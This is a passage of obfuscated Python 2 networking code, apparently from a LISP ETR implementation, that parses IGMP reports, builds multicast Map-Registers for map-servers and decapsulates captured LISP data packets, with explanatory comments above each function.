o0oOoO00o = threading . Timer ( oOOoo ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
o0oOoO00o . start ( )
return
def oO00oOo0OOO ( group_str , group_mapping ) :
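# Group-mapping match helper: parse group_str as an IPv4 group in the
# mapping's instance-id and return the mapping's group-prefix mask length
# if the group falls inside that prefix, else -1. Used for longest-match
# selection of a group-mapping below.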
OOOOoO00o0O = group_mapping . group_prefix . instance_id
ii1 = group_mapping . group_prefix . mask_len
ooO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , group_str , 32 , OOOOoO00o0O )
if ( ooO . is_more_specific ( group_mapping . group_prefix ) ) : return ( ii1 )
return ( - 1 )
def Ii11iI ( lisp_sockets , entries ) :
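# Build and send multicast Map-Registers for a list of
# [source, group, join/leave] entries. The address family is taken from the
# first group; each group is matched against the configured group-mappings
# (longest prefix wins) to pick the instance-id, ms-name/DNS name, sources
# and RLE; one EID-record per entry is built with an RLE RLOC-record (plus
# one RLOC-record per RTR), and the result goes to every matching map-server.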
i1I = len ( entries )
if ( i1I == 0 ) : return
if 7 - 7: i11iIiiIii . OoO0O00
O0O00OOo = None
if ( entries [ 0 ] [ 1 ] . find ( ":" ) != - 1 ) : O0O00OOo = lisp . LISP_AFI_IPV6
if ( entries [ 0 ] [ 1 ] . find ( "." ) != - 1 ) : O0O00OOo = lisp . LISP_AFI_IPV4
if ( entries [ 0 ] [ 1 ] . find ( "-" ) != - 1 ) : O0O00OOo = lisp . LISP_AFI_MAC
if ( O0O00OOo == None ) :
lisp . lprint ( "lisp_send_multicast_map_register() invalid group address" )
return
o00 = [ ]
for i1OOO0000oO , ooO , II1i111 in entries :
if ( i1OOO0000oO != None ) : continue
o00 . append ( [ ooO , II1i111 ] )
if 50 - 50: oooO0oo0oOOOO % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
o0o0O00oo0 = lisp . lisp_decent_pull_xtr_configured ( )
if 93 - 93: iiiiIi11i - Ooo00oOo00o % oOo0O0Ooo . oOo0O0Ooo - Oo
IIIII = { }
entries = [ ]
for ooO , II1i111 in o00 :
O00ooOo = None
for I1111IIi in lisp . lisp_group_mapping_list . values ( ) :
ii1 = oO00oOo0OOO ( ooO , I1111IIi )
if ( ii1 == - 1 ) : continue
if ( O00ooOo == None or ii1 > O00ooOo . group_prefix . mask_len ) :
O00ooOo = I1111IIi
if 80 - 80: Ooo00oOo00o - II11iiII + OoooooooOO
if 98 - 98: II11iiII + i1IIi . oo - II111iiii - Ooo00oOo00o
if ( O00ooOo == None ) :
lisp . lprint ( "No group-mapping for {}, could be underlay group" . format ( ooO ) )
if 24 - 24: OoO0O00 - i1IIi + OoOO0ooOOoo0O
continue
if 38 - 38: OoooooooOO / oOoO0oo0OOOo . O0 / i1IIi / OoO0O00 + iIii1I11I1II1
if 96 - 96: i1I1ii1II1iII
lisp . lprint ( "Use group-mapping '{}' {} for group {}" . format ( O00ooOo . group_name , O00ooOo . group_prefix . print_prefix ( ) , ooO ) )
if 18 - 18: i1I1ii1II1iII * OoOO0ooOOoo0O - o0000oOoOoO0o
OOOOoO00o0O = O00ooOo . group_prefix . instance_id
I111Ii111 = O00ooOo . use_ms_name
II1i1III = O00ooOo . rle_address
i1o0oooO = I111Ii111
if ( o0o0O00oo0 ) :
i1o0oooO = lisp . lisp_get_decent_dns_name_from_str ( OOOOoO00o0O , ooO )
IIIII [ i1o0oooO ] = [ "" , 0 ]
if 89 - 89: II111iiii / iiiiIi11i
if 14 - 14: II11iiII . oo * Oo + II111iiii - Oo + II11iiII
if ( len ( O00ooOo . sources ) == 0 ) :
entries . append ( [ "0.0.0.0" , ooO , OOOOoO00o0O , i1o0oooO , II1i1III , II1i111 ] )
continue
if 18 - 18: iiiiIi11i - Ooo00oOo00o - oo - oo
for IIiIi1iI in O00ooOo . sources :
IIIII [ i1o0oooO ] = [ "" , 0 ]
entries . append ( [ IIiIi1iI , ooO , OOOOoO00o0O , i1o0oooO , II1i1III , II1i111 ] )
if 54 - 54: OoO0O00 + oo / i1I1ii1II1iII . oo * oOo0O0Ooo
if 1 - 1: oOo0O0Ooo * ooOO00oOo . i1IIi / OoO0O00 . oOoO0oo0OOOo + OoO0O00
if 17 - 17: OoO0O00 + ooOO00oOo / o0000oOoOoO0o / i1I1ii1II1iII * II11iiII
i1I = len ( entries )
if ( i1I == 0 ) : return
if 29 - 29: ooOO00oOo % OoooooooOO * iiiiIi11i / II111iiii - iiiiIi11i
lisp . lprint ( "Build Map-Register for {} multicast entries" . format ( i1I ) )
IiIi1 = lisp . lisp_rle_node ( )
IiIi1 . level = 128
oo00ooOoo = lisp . lisp_get_any_translated_rloc ( )
II1i1III = lisp . lisp_rle ( "" )
II1i1III . rle_nodes . append ( IiIi1 )
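# Single-node RLE (replication list entry) advertised as the RLOC for each
# multicast registration; its address is filled in per-entry below with the
# NAT-translated RLOC, the mapping's configured RLE address, or this xTR's
# own RLOC, in that order of preference.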
if ( o0o0O00oo0 == False ) :
for oO0OOoO0 in lisp . lisp_map_servers_list . values ( ) :
IIIII [ oO0OOoO0 . ms_name ] = [ "" , 0 ]
if 49 - 49: II11iiII / OoooooooOO / oo
if 74 - 74: o0oo0o % oOoO0oo0OOOo
if 7 - 7: II111iiii
iI = None
if ( lisp . lisp_nat_traversal ) : iI = lisp . lisp_hostname
if 38 - 38: oooO0oo0oOOOO . o0000oOoOoO0o
if 24 - 24: Ooo00oOo00o - Ooo00oOo00o + oOoO0oo0OOOo + oo - iiiiIi11i
if 12 - 12: i1I1ii1II1iII . oooO0oo0oOOOO . oOo0O0Ooo / O0
if 58 - 58: Ooo00oOo00o - II111iiii % iiiiIi11i + o0oo0o . oOo0O0Ooo / oooO0oo0oOOOO
II = 0
for IIiIi in lisp . lisp_rtr_list . values ( ) :
if ( IIiIi == None ) : continue
II += 1
if 94 - 94: OoOO0ooOOoo0O + II111iiii % i11iIiiIii
if 8 - 8: Oo * O0
if 73 - 73: Ooo00oOo00o / iiiiIi11i / OoOO0ooOOoo0O / ooOO00oOo
if 11 - 11: oOo0O0Ooo + oooO0oo0oOOOO - OoooooooOO / ooOO00oOo
if 34 - 34: Oo
O0O0O0Oo = ""
for i1OOO0000oO , ooO , OOOOoO00o0O , O000 , i1iI1 , II1i111 in entries :
if 44 - 44: oOoO0oo0OOOo - o0000oOoOoO0o / II111iiii * ooOO00oOo * OoO0O00
if 73 - 73: Ooo00oOo00o - oo * i1IIi / i11iIiiIii * II11iiII % II111iiii
if 56 - 56: OoooooooOO * OoO0O00 . OoO0O00 . oOoO0oo0OOOo
if 24 - 24: OoO0O00 . OoOO0ooOOoo0O * o0000oOoOoO0o % i1I1ii1II1iII / II11iiII
if ( IIIII . has_key ( O000 ) == False ) : continue
if 58 - 58: oo - oOoO0oo0OOOo % O0 . oo % ooOO00oOo % oooO0oo0oOOOO
I1I1I1IIi1III = lisp . lisp_eid_record ( )
I1I1I1IIi1III . rloc_count = 1 + II
I1I1I1IIi1III . authoritative = True
I1I1I1IIi1III . record_ttl = lisp . LISP_REGISTER_TTL if II1i111 else 0
I1I1I1IIi1III . eid = lisp . lisp_address ( O0O00OOo , i1OOO0000oO , 0 , OOOOoO00o0O )
if ( I1I1I1IIi1III . eid . address == 0 ) : I1I1I1IIi1III . eid . mask_len = 0
I1I1I1IIi1III . group = lisp . lisp_address ( O0O00OOo , ooO , 0 , OOOOoO00o0O )
if ( I1I1I1IIi1III . group . is_mac_broadcast ( ) and I1I1I1IIi1III . eid . address == 0 ) : I1I1I1IIi1III . eid . mask_len = 0
if 87 - 87: iiiiIi11i - i11iIiiIii
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - Ooo00oOo00o
oO0o0oooO0oO = ""
I111Ii111 = ""
if ( lisp . lisp_decent_pull_xtr_configured ( ) ) :
oO0o0oooO0oO = lisp . lisp_get_decent_index ( I1I1I1IIi1III . group )
oO0o0oooO0oO = lisp . bold ( str ( oO0o0oooO0oO ) , False )
oO0o0oooO0oO = "with decent-index {}" . format ( oO0o0oooO0oO )
else :
oO0o0oooO0oO = "for ms-name '{}'" . format ( O000 )
if 23 - 23: OoOO0ooOOoo0O
if 40 - 40: Ooo00oOo00o - II111iiii / OoO0O00
iiIiI1ii = lisp . green ( I1I1I1IIi1III . print_eid_tuple ( ) , False )
lisp . lprint ( " EID-prefix {} {}{}" . format ( iiIiI1ii , I111Ii111 ,
oO0o0oooO0oO ) )
if 56 - 56: OoooooooOO - OoOO0ooOOoo0O - i1IIi
O0O0O0Oo += I1I1I1IIi1III . encode ( )
I1I1I1IIi1III . print_record ( " " , False )
IIIII [ O000 ] [ 1 ] += 1
if 8 - 8: o0oo0o / II11iiII . oo + oOoO0oo0OOOo / i11iIiiIii
if 31 - 31: Oo - iIii1I11I1II1 + i1I1ii1II1iII . OoO0O00 / oooO0oo0oOOOO % iIii1I11I1II1
if 6 - 6: oooO0oo0oOOOO * i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + Ooo00oOo00o / i1IIi
if 53 - 53: OoOO0ooOOoo0O + iIii1I11I1II1
i1II = lisp . lisp_rloc_record ( )
i1II . rloc_name = iI
if ( oo00ooOoo != None ) :
IiIi1 . address = oo00ooOoo
elif ( i1iI1 != None ) :
IiIi1 . address = i1iI1
else :
IiIi1 . address = i1iI1 = lisp . lisp_myrlocs [ 0 ]
if 24 - 24: i1I1ii1II1iII - oooO0oo0oOOOO - i1I1ii1II1iII * oOoO0oo0OOOo . OoooooooOO / oooO0oo0oOOOO
if 66 - 66: OoO0O00
i1II . rle = II1i1III
i1II . local_bit = True
i1II . reach_bit = True
i1II . priority = 255
i1II . weight = 0
i1II . mpriority = 1
i1II . mweight = 100
O0O0O0Oo += i1II . encode ( )
i1II . print_record ( " " )
if 97 - 97: i1IIi - OoooooooOO / o0oo0o * oo
if 55 - 55: Ooo00oOo00o . i1I1ii1II1iII
if 87 - 87: Ooo00oOo00o % iIii1I11I1II1
if 100 - 100: o0oo0o . oo * o0oo0o - oo . OoOO0ooOOoo0O * o0000oOoOoO0o
if 89 - 89: ooOO00oOo + oooO0oo0oOOOO * o0oo0o
for IIiIi in lisp . lisp_rtr_list . values ( ) :
if ( IIiIi == None ) : continue
i1II = lisp . lisp_rloc_record ( )
i1II . rloc . copy_address ( IIiIi )
i1II . priority = 254
i1II . rloc_name = "RTR"
i1II . weight = 0
i1II . mpriority = 255
i1II . mweight = 0
i1II . local_bit = False
i1II . reach_bit = True
O0O0O0Oo += i1II . encode ( )
i1II . print_record ( " RTR " )
if 28 - 28: OoooooooOO . iiiiIi11i % oOoO0oo0OOOo / i1IIi / II11iiII
if 36 - 36: Ooo00oOo00o + OoOO0ooOOoo0O - oooO0oo0oOOOO + iIii1I11I1II1 + OoooooooOO
if 4 - 4: II111iiii . OoOO0ooOOoo0O + o0000oOoOoO0o * o0oo0o . Oo
if 87 - 87: oOo0O0Ooo / ooOO00oOo / i11iIiiIii
if 74 - 74: iiiiIi11i / oOoO0oo0OOOo % Ooo00oOo00o
IIIII [ O000 ] [ 0 ] += O0O0O0Oo
if 88 - 88: oOo0O0Ooo - i11iIiiIii % Ooo00oOo00o * OoOO0ooOOoo0O + oOoO0oo0OOOo
if 52 - 52: II111iiii . oo + oOo0O0Ooo % ooOO00oOo
if 62 - 62: Ooo00oOo00o
if 15 - 15: OoOO0ooOOoo0O + o0000oOoOoO0o . II11iiII * ooOO00oOo . oOo0O0Ooo
if 18 - 18: i1IIi % II111iiii + o0oo0o % o0000oOoOoO0o
II11iI111i1 = lisp . lisp_map_register ( )
II11iI111i1 . nonce = 0xaabbccdddfdfdf00
II11iI111i1 . xtr_id_present = True
II11iI111i1 . proxy_reply_requested = True
II11iI111i1 . map_notify_requested = False
II11iI111i1 . merge_register_requested = True
if 72 - 72: iIii1I11I1II1
if 45 - 45: OoO0O00 - Ooo00oOo00o % o0oo0o
if 38 - 38: o0oo0o % II11iiII - OoooooooOO
if 87 - 87: ooOO00oOo % oo
for oO0OOoO0 in lisp . lisp_map_servers_list . values ( ) :
i1o0oooO = oO0OOoO0 . dns_name if o0o0O00oo0 else oO0OOoO0 . ms_name
if 77 - 77: iIii1I11I1II1 - i1IIi . iiiiIi11i
if 26 - 26: Ooo00oOo00o * oooO0oo0oOOOO . i1IIi
if 59 - 59: O0 + i1IIi - Ooo00oOo00o
if 62 - 62: i11iIiiIii % II11iiII . oooO0oo0oOOOO . II11iiII
if ( IIIII . has_key ( i1o0oooO ) == False ) : continue
if 84 - 84: i11iIiiIii * ooOO00oOo
if 18 - 18: II11iiII - o0000oOoOoO0o - oOo0O0Ooo / o0oo0o - O0
if 30 - 30: O0 + oOoO0oo0OOOo + II111iiii
if 14 - 14: Ooo00oOo00o / II11iiII - iIii1I11I1II1 - iiiiIi11i % Oo
II11iI111i1 . record_count = IIIII [ i1o0oooO ] [ 1 ]
if ( II11iI111i1 . record_count == 0 ) : continue
if 49 - 49: Oo * iiiiIi11i / Ooo00oOo00o / OoO0O00 * iIii1I11I1II1
II11iI111i1 . nonce += 1
II11iI111i1 . alg_id = oO0OOoO0 . alg_id
II11iI111i1 . key_id = oO0OOoO0 . key_id
II11iI111i1 . xtr_id = oO0OOoO0 . xtr_id
II11iI111i1 . site_id = oO0OOoO0 . site_id
II11iI111i1 . encrypt_bit = ( oO0OOoO0 . ekey != None )
oOO0 = II11iI111i1 . encode ( )
II11iI111i1 . print_map_register ( )
if 57 - 57: oOo0O0Ooo - iiiiIi11i / Oo % i11iIiiIii
if 3 - 3: i1I1ii1II1iII . Oo % oo + oOoO0oo0OOOo
if 64 - 64: i1IIi
if 29 - 29: Ooo00oOo00o / i11iIiiIii / oo % iiiiIi11i % i11iIiiIii
if 18 - 18: II11iiII + o0oo0o
oOoOOo0oo0 = II11iI111i1 . encode_xtr_id ( "" )
oOO0 = oOO0 + O0O0O0Oo + oOoOOo0oo0
if 80 - 80: iiiiIi11i + Ooo00oOo00o * o0000oOoOoO0o + ooOO00oOo
oO0OOoO0 . map_registers_multicast_sent += 1
lisp . lisp_send_map_register ( lisp_sockets , oOO0 , II11iI111i1 , oO0OOoO0 )
if 75 - 75: OoOO0ooOOoo0O / Ooo00oOo00o / II11iiII / oooO0oo0oOOOO % Oo + II111iiii
if 4 - 4: i1I1ii1II1iII - OoO0O00 - oooO0oo0oOOOO - OoOO0ooOOoo0O % i11iIiiIii / ooOO00oOo
if 50 - 50: Oo + i1IIi
if 31 - 31: o0000oOoOoO0o
oO0OOoO0 . resolve_dns_name ( )
if 78 - 78: i11iIiiIii + Ooo00oOo00o + o0oo0o / Ooo00oOo00o % iIii1I11I1II1 % oooO0oo0oOOOO
if 83 - 83: iIii1I11I1II1 % oOo0O0Ooo % Ooo00oOo00o % o0oo0o . oOoO0oo0OOOo % O0
if 47 - 47: Ooo00oOo00o
if 66 - 66: oo - oooO0oo0oOOOO
time . sleep ( .001 )
if 33 - 33: oo / ooOO00oOo
return
if 12 - 12: II111iiii
if 2 - 2: i1IIi - oo + OoOO0ooOOoo0O . II111iiii
if 25 - 25: iiiiIi11i
if 34 - 34: oOo0O0Ooo . iIii1I11I1II1 % O0
if 43 - 43: oOoO0oo0OOOo - i1I1ii1II1iII
O000O = { 1 : "include-mode" , 2 : "exclude-mode" ,
3 : "change-to-include" , 4 : "change-to-exclude" , 5 : "allow-new-source" ,
6 : "block-old-sources" }
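# IGMPv3 group-record types (RFC 3376). Types 1 and 5 (and type 4 with an
# empty source list) are treated as joins by the report parser below; the
# others are treated as leaves.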
def i1I1i1i ( packet ) :
global Oo0o0000o0o0
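# IGMP report handler. Skips the IP header, accepts types 0x12/0x16
# (IGMPv1/v2 report), 0x17 (IGMPv2 leave) and 0x22 (IGMPv3 report),
# suppresses link-local 224.0.0.x groups, turns each group record into
# [source, group, join/leave] entries, and passes them to the multicast
# Map-Register builder above.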
if 36 - 36: II111iiii % O0
IiIiiI11111I1 = lisp . bold ( "Receive" , False )
lisp . lprint ( "{} {}-byte IGMP packet: {}" . format ( IiIiiI11111I1 , len ( packet ) ,
lisp . lisp_format_packet ( packet ) ) )
if 35 - 35: iIii1I11I1II1 - II11iiII % Ooo00oOo00o
if 30 - 30: o0oo0o % o0oo0o % oooO0oo0oOOOO . oOo0O0Ooo
if 9 - 9: Oo / II111iiii . oOo0O0Ooo % Ooo00oOo00o * II111iiii - Oo
if 55 - 55: oo
Ii1i1 = ( struct . unpack ( "B" , packet [ 0 ] ) [ 0 ] & 0x0f ) * 4
if 65 - 65: iiiiIi11i + oOoO0oo0OOOo / II11iiII
if 85 - 85: iIii1I11I1II1 / OoooooooOO % II111iiii
if 49 - 49: i11iIiiIii % oOo0O0Ooo + o0oo0o . II111iiii % i1I1ii1II1iII * II11iiII
if 67 - 67: i1IIi
iii = packet [ Ii1i1 : : ]
oOOOo = struct . unpack ( "B" , iii [ 0 ] ) [ 0 ]
ooO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 31 - 31: oOo0O0Ooo + oOo0O0Ooo . i11iIiiIii / Oo % OoOO0ooOOoo0O / oOo0O0Ooo
IIiI1I111iIiI = ( oOOOo in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
if ( IIiI1I111iIiI == False ) :
ooOoooOO0oOooO00 = "{} ({})" . format ( oOOOo , IiII1IiiIiI1 [ oOOOo ] ) if IiII1IiiIiI1 . has_key ( oOOOo ) else oOOOo
if 37 - 37: oooO0oo0oOOOO
lisp . lprint ( "IGMP type {} not supported" . format ( ooOoooOO0oOooO00 ) )
return
if 37 - 37: OoO0O00 / oooO0oo0oOOOO * O0
if 73 - 73: i1I1ii1II1iII * i1I1ii1II1iII / Oo
if ( len ( iii ) < 8 ) :
lisp . lprint ( "IGMP message too small" )
return
ooO . address = socket . ntohl ( struct . unpack ( "II" , iii [ : 8 ] ) [ 1 ] )
iIiI1I1ii1I1 = ooO . print_address_no_iid ( )
if 83 - 83: II11iiII / O0 % i1I1ii1II1iII - Ooo00oOo00o . OoO0O00
if 49 - 49: iIii1I11I1II1 * i1IIi . OoooooooOO
if 90 - 90: Ooo00oOo00o % oOoO0oo0OOOo - iIii1I11I1II1 % oOo0O0Ooo
if 8 - 8: oOo0O0Ooo * OoO0O00 / oooO0oo0oOOOO % o0000oOoOoO0o - oo
if ( oOOOo == 0x17 ) :
lisp . lprint ( "IGMPv2 leave (*, {})" . format ( lisp . bold ( iIiI1I1ii1I1 , False ) ) )
Ii11iI ( Oo0o0000o0o0 ,
[ [ None , iIiI1I1ii1I1 , False ] ] )
return
if 71 - 71: i1I1ii1II1iII
if ( oOOOo in ( 0x12 , 0x16 ) ) :
lisp . lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( oOOOo == 0x12 ) else 2 , lisp . bold ( iIiI1I1ii1I1 , False ) ) )
if 23 - 23: i1IIi . iIii1I11I1II1 . II11iiII . O0 % o0000oOoOoO0o % i11iIiiIii
if 11 - 11: O0 - II111iiii . II11iiII . o0000oOoOoO0o % o0oo0o
if 21 - 21: OoO0O00 / i1I1ii1II1iII . o0oo0o * OoooooooOO + OoOO0ooOOoo0O - i1IIi
if 58 - 58: oOoO0oo0OOOo
if 2 - 2: II111iiii / o0oo0o
if ( iIiI1I1ii1I1 . find ( "224.0.0." ) != - 1 ) :
lisp . lprint ( "Suppress registration for link-local groups" )
else :
Ii11iI ( Oo0o0000o0o0 ,
[ [ None , iIiI1I1ii1I1 , True ] ] )
if 54 - 54: i1IIi . OoOO0ooOOoo0O - oOoO0oo0OOOo + Oo + OoO0O00 / OoO0O00
if 22 - 22: Oo . iIii1I11I1II1
if 12 - 12: o0000oOoOoO0o
if 71 - 71: oo . II111iiii . oo - Oo
if 45 - 45: oooO0oo0oOOOO / O0 / oOo0O0Ooo * II11iiII
return
if 18 - 18: iIii1I11I1II1 + II11iiII + iIii1I11I1II1 . oOoO0oo0OOOo + o0oo0o . Oo
if 7 - 7: oOoO0oo0OOOo + iIii1I11I1II1 * OoOO0ooOOoo0O * OoOO0ooOOoo0O / II111iiii - o0000oOoOoO0o
if 65 - 65: iiiiIi11i + oOo0O0Ooo + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . Oo % OoO0O00
ooo000oOO = ooO . address
iii = iii [ 8 : : ]
if 27 - 27: Ooo00oOo00o * i11iIiiIii * ooOO00oOo
oOOoO = "BBHI"
oOo0Oo0O0O = struct . calcsize ( oOOoO )
III1II1i = "I"
iI1i1IiIIIIi = struct . calcsize ( III1II1i )
i1OOO0000oO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 65 - 65: O0 * oo / oo . oOo0O0Ooo
if 87 - 87: II111iiii * oOoO0oo0OOOo % OoO0O00 * OoO0O00
if 58 - 58: II11iiII . Ooo00oOo00o + oo % OoO0O00 - ooOO00oOo
if 50 - 50: i1I1ii1II1iII % II111iiii - Oo . i1IIi + O0 % i1I1ii1II1iII
i1iIi1IIiIII1 = [ ]
for oO0 in range ( ooo000oOO ) :
if ( len ( iii ) < oOo0Oo0O0O ) : return
i1Ii11I1II , oOOOoo0o , iiiI1IiIIii , IIIIiii = struct . unpack ( oOOoO ,
iii [ : oOo0Oo0O0O ] )
if 26 - 26: OoooooooOO - Oo * i11iIiiIii + O0 * iiiiIi11i
iii = iii [ oOo0Oo0O0O : : ]
if 87 - 87: OoO0O00 + O0 - OoOO0ooOOoo0O * iIii1I11I1II1 . o0oo0o % Ooo00oOo00o
if ( O000O . has_key ( i1Ii11I1II ) == False ) :
lisp . lprint ( "Invalid record type {}" . format ( i1Ii11I1II ) )
continue
if 83 - 83: II111iiii * i1IIi * i1I1ii1II1iII . oOoO0oo0OOOo / OoOO0ooOOoo0O + i1IIi
if 43 - 43: OoooooooOO
oOOO0 = O000O [ i1Ii11I1II ]
iiiI1IiIIii = socket . ntohs ( iiiI1IiIIii )
ooO . address = socket . ntohl ( IIIIiii )
iIiI1I1ii1I1 = ooO . print_address_no_iid ( )
if 32 - 32: Oo % o0oo0o * OoO0O00
lisp . lprint ( "Record type: {}, group: {}, source-count: {}" . format ( oOOO0 , iIiI1I1ii1I1 , iiiI1IiIIii ) )
II1i111 = False
if ( i1Ii11I1II in ( 1 , 5 ) ) : II1i111 = True
if ( i1Ii11I1II == 4 and iiiI1IiIIii == 0 ) : II1i111 = True
O0000oO0o00 = "join" if ( II1i111 ) else "leave"
if 80 - 80: OoooooooOO + oooO0oo0oOOOO
if 95 - 95: o0oo0o / iiiiIi11i * o0oo0o - OoooooooOO * OoooooooOO % ooOO00oOo
if 43 - 43: OoO0O00 . o0oo0o
if 12 - 12: o0oo0o + II11iiII + OoOO0ooOOoo0O . oooO0oo0oOOOO / o0000oOoOoO0o
if ( iIiI1I1ii1I1 . find ( "224.0.0." ) != - 1 ) :
lisp . lprint ( "Suppress registration for link-local groups" )
continue
if ( iiiI1IiIIii == 0 ) :
i1iIi1IIiIII1 . append ( [ None , iIiI1I1ii1I1 , II1i111 ] )
lisp . lprint ( "IGMPv3 {} (*, {})" . format ( lisp . bold ( O0000oO0o00 , False ) ,
lisp . bold ( iIiI1I1ii1I1 , False ) ) )
if 84 - 84: II111iiii * iiiiIi11i * II111iiii % oooO0oo0oOOOO / oo
if 100 - 100: oooO0oo0oOOOO . o0000oOoOoO0o - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: o0oo0o * OoO0O00 . OoOO0ooOOoo0O
if 49 - 49: oooO0oo0oOOOO * O0 . oooO0oo0oOOOO
if 19 - 19: II111iiii - oooO0oo0oOOOO
for OOOOo000o00OO in range ( iiiI1IiIIii ) :
if ( len ( iii ) < iI1i1IiIIIIi ) : return
IIIIiii = struct . unpack ( III1II1i , iii [ : iI1i1IiIIIIi ] ) [ 0 ]
i1OOO0000oO . address = socket . ntohl ( IIIIiii )
Oo0 = i1OOO0000oO . print_address_no_iid ( )
i1iIi1IIiIII1 . append ( [ Oo0 , iIiI1I1ii1I1 , II1i111 ] )
lisp . lprint ( "{} ({}, {})" . format ( O0000oO0o00 ,
lisp . green ( Oo0 , False ) , lisp . bold ( iIiI1I1ii1I1 , False ) ) )
iii = iii [ iI1i1IiIIIIi : : ]
if ( len ( i1iIi1IIiIII1 ) != 0 ) :
Ii11iI ( Oo0o0000o0o0 , i1iIi1IIiIII1 )
if 50 - 50: II111iiii - o0oo0o + iIii1I11I1II1 + iIii1I11I1II1
return
def i11IiI1iiI11 ( parms , not_used , packet ) :
global I11
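# pcap callback for packets captured on the ETR. It strips the datalink
# header (except on macOS), hands IGMP (IP protocol 2) to the IGMP handler,
# lets RLOC-probes go to lisp_parse_packet(), ignores packets sourced from
# the LISP data port, reassembles fragments, decapsulates the LISP data
# packet, updates decap stats, and bridges or forwards the inner packet
# (IPv6 EIDs appear to go out the lispers.net tun device).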
if 85 - 85: oOoO0oo0OOOo - oOo0O0Ooo / oOoO0oo0OOOo + II11iiII - i1I1ii1II1iII
IIii1III = parms [ 0 ]
oOo0oooo00o = parms [ 1 ]
if ( lisp . lisp_is_macos ( ) == False ) :
iI111II1ii = 4 if IIii1III == "lo0" else 16
packet = packet [ iI111II1ii : : ]
if 62 - 62: i1I1ii1II1iII * iIii1I11I1II1 . oooO0oo0oOOOO - OoooooooOO * II111iiii
if 45 - 45: O0 % oo - i1I1ii1II1iII . ooOO00oOo
if 42 - 42: i1I1ii1II1iII / Ooo00oOo00o + OoO0O00 . OoO0O00 % II11iiII
if 16 - 16: i1IIi + ooOO00oOo % oOo0O0Ooo + o0000oOoOoO0o * OoO0O00
if 3 - 3: i11iIiiIii
Oo0iII1iI1IIiI = struct . unpack ( "B" , packet [ 9 ] ) [ 0 ]
if ( Oo0iII1iI1IIiI == 2 ) :
i1I1i1i ( packet )
return
if 69 - 69: OoOO0ooOOoo0O / i11iIiiIii * Ooo00oOo00o / o0oo0o
if 71 - 71: Ooo00oOo00o / II11iiII % II11iiII
if 89 - 89: OoooooooOO + i11iIiiIii / OoOO0ooOOoo0O + iIii1I11I1II1 % Oo
if 29 - 29: oOoO0oo0OOOo
if 53 - 53: i11iIiiIii . oOoO0oo0OOOo % o0000oOoOoO0o / Oo % iIii1I11I1II1
iIiIii1I1 = packet
packet , i1OOO0000oO , O0OOOOo0 , OOooO0Oo00 = lisp . lisp_is_rloc_probe ( packet , 0 )
if ( iIiIii1I1 != packet ) :
if ( i1OOO0000oO == None ) : return
lisp . lisp_parse_packet ( Oo0o0000o0o0 , packet , i1OOO0000oO , O0OOOOo0 , OOooO0Oo00 )
return
II1iI = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
if ( II1iI == lisp . LISP_DATA_PORT ) : return
packet = lisp . lisp_reassemble ( packet )
if ( packet == None ) : return
if 5 - 5: i1IIi * oOo0O0Ooo % oo . ooOO00oOo * oOoO0oo0OOOo - o0oo0o
packet = lisp . lisp_packet ( packet )
oO0OOOO0o0 = packet . decode ( True , I11 , lisp . lisp_decap_stats )
if ( oO0OOOO0o0 == None ) : return
if 67 - 67: OoO0O00 / Oo - oooO0oo0oOOOO
if 74 - 74: OoOO0ooOOoo0O * o0000oOoOoO0o - oOoO0oo0OOOo % iIii1I11I1II1
if 56 - 56: oOoO0oo0OOOo - O0
if 58 - 58: oooO0oo0oOOOO + iIii1I11I1II1
packet . print_packet ( "Receive" , True )
if ( lisp . lisp_decent_push_configured and
packet . inner_dest . is_multicast_address ( ) and packet . lisp_header . get_instance_id ( ) == 0xffffff ) :
if 76 - 76: o0000oOoOoO0o + iIii1I11I1II1 + oOo0O0Ooo . ooOO00oOo
i1OOO0000oO = packet . inner_source . print_address_no_iid ( )
packet . strip_outer_headers ( )
packet = packet . packet [ 28 : : ]
packet = lisp . lisp_packet_ipc ( packet , i1OOO0000oO , II1iI )
lisp . lisp_ipc ( packet , I11 , "lisp-ms" )
return
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 32 - 32: II111iiii + oOo0O0Ooo % Oo / oOo0O0Ooo + oOoO0oo0OOOo
if 2 - 2: i11iIiiIii - o0oo0o + ooOO00oOo % OoOO0ooOOoo0O * o0000oOoOoO0o
if 54 - 54: O0 - i1I1ii1II1iII . II11iiII % i1I1ii1II1iII + i1I1ii1II1iII
if 36 - 36: II11iiII % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . OoO0O00 * iiiiIi11i . OoOO0ooOOoo0O / i1IIi
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( packet . packet ) )
if 50 - 50: o0oo0o / i1IIi % OoooooooOO
if 83 - 83: oOoO0oo0OOOo * oOoO0oo0OOOo + II11iiII
if 57 - 57: O0 - O0 . oOoO0oo0OOOo / Ooo00oOo00o / o0000oOoOoO0o
if 20 - 20: II11iiII * II111iiii - oOo0O0Ooo - iiiiIi11i * o0oo0o
packet . strip_outer_headers ( )
I1i1II1 = lisp . bold ( "Forward" , False )
if 89 - 89: ooOO00oOo / ooOO00oOo
if 1 - 1: oOoO0oo0OOOo . i11iIiiIii
if 74 - 74: O0 + OoooooooOO / iiiiIi11i / oOo0O0Ooo . oOoO0oo0OOOo % iiiiIi11i
if 34 - 34: i1IIi . oo
i11I1IIiiii = packet . inner_dest . is_mac ( )
if ( i11I1IIiiii ) :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
I1i1II1 = lisp . bold ( "Bridge" , False )
elif ( packet . inner_version == 4 ) :
packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
packet . inner_ttl = packet . outer_ttl
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl = packet . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
